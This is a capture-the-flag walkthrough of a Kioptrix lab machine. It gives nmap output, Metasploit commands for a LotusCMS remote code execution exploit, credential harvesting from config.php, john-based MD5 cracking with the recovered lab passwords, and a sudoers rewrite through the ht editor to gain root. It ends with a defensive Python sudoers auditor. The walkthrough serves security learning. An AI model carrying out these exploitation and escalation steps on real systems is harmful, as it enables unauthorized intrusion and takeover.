Start by scanning the machine with nmap:
nmap -sC -sV -oA nmap/Level1.2 192.168.43.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 09:21 EDT
Nmap scan report for 192.168.43.176
Host is up (0.0046s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:72:68:BE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
Then, seeing that port 80 is open, let's put the IP in the browser and see what we get.
Got this output, and gallery and phpmyadmin caught my eye!
First we navigate to phpmyadmin and get a login form.
I managed to log in with the username administrator, but nothing interesting popped up.
I navigate back to the login form to see what I can do from here.
I tried SQL injection with no luck, but I saw the login form is powered by LotusCMS, so I decided to use searchsploit to see what exploits we can find.
Found it! Next, we can use msfconsole to run the exploit.
Type use exploit/multi/http/lcms_php_exec, then type show options.
Then set RHOST 192.168.43.176 to point at the remote host IP.
Set URI to /.
Type run or exploit.
Then type shell to drop from meterpreter into a shell.
Then, we will get a proper shell by typing /bin/bash -i.
Then, we need to locate a file called config.php.
After cat-ing the file we got a lot of code, and among it I managed to see the login credentials for the phpmyadmin login form.
After that, navigate to the gallery database, open the dev_account table, and we will find two users with their usernames and hashed passwords.
Put them in a text file and run john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hash.txt
Then we will get the passwords for both users:
dreg:mast3r
loneferret:starwars
Privilege Escalation
Then, we log in as both users over ssh. I can't find anything interesting in the dreg user, so maybe loneferret is the one we want.
After logging into the account, we cat the CompanyPolicy.README file and get this:
When we type sudo ht, we get this:
Then I type which ht and ls -l /usr/local/bin/ht, and we know it is owned by root and can be exploited through its SUID rights.
Then we can type export TERM=xterm so the editor's full-screen interface displays properly.
Then run sudo ht, press F3, and navigate to /etc/sudoers.
Change the loneferret line to loneferret ALL=NOPASSWD: ALL.
Then press F2 to save and F10 to quit.
Type sudo su and you will get root.
Alternatively, you can append /bin/bash to the end of the sudoers line.
Then type sudo /bin/bash and you will get root!
Congratulations!
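The root cause of this escalation is a sudoers rule that lets a user run an editor (ht) as root, which is as good as granting root outright. As an added illustration, not code from the original post, here is a small Python audit that parses sudoers rules and flags NOPASSWD grants, ALL grants and sudo-runnable editors; the sudoers lines are constructed samples, not copied from the machine.

```python
import re
# Constructed sample sudoers content for the demo; not copied from the target machine.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
root       ALL=(ALL) ALL
%admin     ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg       ALL=(ALL) /usr/bin/apt-get
"""

# Editors and pagers that, once running as root, can rewrite /etc/sudoers or spawn a shell.
SHELL_CAPABLE = {"ht", "vi", "vim", "nano", "ed", "emacs", "less", "more", "sh", "bash"}

# user  host(s) = (runas) command list; the host field may not contain '=' or whitespace
RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, problem) findings for each risky grant in a sudoers document."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m or m.group("user") == "root":       # root already has everything
            continue
        user, tags, cmds = m.group("user"), set(), []
        for part in m.group("cmds").split(","):
            part = part.strip()
            # Tags such as NOPASSWD: prefix a command; peel them off and remember them
            while ":" in part and part.split(":", 1)[0].isupper():
                tag, part = part.split(":", 1)
                tags.add(tag.strip())
                part = part.strip()
            cmds.append(part)
        if "NOPASSWD" in tags:
            findings.append((user, "NOPASSWD grant: no password needed to run as root"))
        for cmd in cmds:
            name = cmd.rsplit("/", 1)[-1]
            if cmd == "ALL":
                findings.append((user, "ALL: unrestricted root command execution"))
            elif not cmd.startswith("!") and name in SHELL_CAPABLE:
                findings.append((user, f"{cmd}: can edit /etc/sudoers or spawn a root shell"))
    return findings

if __name__ == "__main__":
    for user, problem in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {problem}")
```

On the sample, dreg's apt-get grant and the negated !/usr/bin/su entry are not flagged, while the ht grant and the NOPASSWD tag on loneferret's line are.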